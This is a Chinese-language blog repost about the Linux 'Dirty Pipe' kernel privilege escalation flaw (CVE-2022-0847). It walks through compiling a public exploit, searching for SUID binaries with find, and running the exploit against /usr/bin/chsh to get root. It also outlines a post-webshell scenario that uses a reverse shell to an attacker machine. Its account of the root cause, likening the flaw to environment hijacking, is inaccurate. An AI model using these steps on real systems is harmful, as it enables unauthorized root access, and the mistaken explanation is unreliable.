CVE-2022-0847 Linux Kernel本地提权漏洞
2022/3/9 7:15:23
本文主要是介绍CVE-2022-0847 Linux Kernel本地提权漏洞,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
0x00 漏洞概述
CVE ID | CVE-2022-0847 | 时 间 | 2022-03-07 |
---|---|---|---|
类 型 | LPE | 等 级 | 严重 |
远程利用 | 否 | 影响范围 | |
攻击复杂度 | 用户交互 | ||
PoC/EXP | 已公开 | 在野利用 |
0x01 漏洞详情
3月7日,研究人员公开披露了Linux 内核中的一个权限提升漏洞(CVE-2022-0847,也称为“Dirty Pipe”),允许非特权用户注入和覆盖任意只读文件中的数据,导致权限提升,并最终获得root权限。该漏洞影响了 Linux Kernel 5.8 及更高版本,甚至影响了Android设备。
CVE-2022-0847漏洞类似于 2016 年修复的 Dirty COW 漏洞 (CVE-2016-5195),但它更容易被利用,目前此漏洞的PoC/EXP已经发布。
0x02 影响范围
Linux Kernel 版本 >= 5.8
Linux Kernel 版本 < 5.16.11 / 5.15.25 /5.10.102
0x03 漏洞复现
在本地Kali提权
1、查看基本Linux系统信息
2、先将EXP这个C文件编译成二进制可执行文件
gcc -o exp dirtypipez.c chmod +x exp
3、输入下面这三条命令中的任意一个
find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} \;
4、使用刚刚编译的exp
./exp /usr/bin/chsh
5、成功提权
实战环境下的提权
1、先获取webshell,进行信息收集,发现目标系统版本符合这个漏洞
2、上传c文件并且编译,然后使用find命令提权
可以看到,无效,这时候进行bash反弹shell到攻击机上
3、再次使用这些命令
4、成功提权
0x04 漏洞原理
暂时没有特别深入研究,目前只知道和环境劫持提权差不多
环境劫持提权
环境劫持需要的两个条件 存在带有suid的文件 suid文件存在系统命令
寻找suid文件
find / -perm -u=s -type f 2>/dev/null
0x04 总结
1、这次的提权,和之前的那个CVE-2021-3034 Linux pkexec提权类似,在实战过程中要先反弹shell到攻击机上,然后再使用提权命令
2、这次的提权使用到了find命令,也就是环境劫持提权,有兴趣可以继续研究一下。
这篇关于CVE-2022-0847 Linux Kernel本地提权漏洞的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-11-12如何创建可引导的 ESXi USB 安装介质 (macOS, Linux, Windows)
- 2024-11-08linux的 vi编辑器中搜索关键字有哪些常用的命令和技巧?-icode9专业技术文章分享
- 2024-11-08在 Linux 的 vi 或 vim 编辑器中什么命令可以直接跳到文件的结尾?-icode9专业技术文章分享
- 2024-10-22原生鸿蒙操作系统HarmonyOS NEXT(HarmonyOS 5)正式发布
- 2024-10-18操作系统入门教程:新手必看的基本操作指南
- 2024-10-18初学者必看:操作系统入门全攻略
- 2024-10-17操作系统入门教程:轻松掌握操作系统基础知识
- 2024-09-11Linux部署Scrapy学习:入门级指南
- 2024-09-11Linux部署Scrapy:入门级指南
- 2024-08-21【Linux】分区向左扩容的方法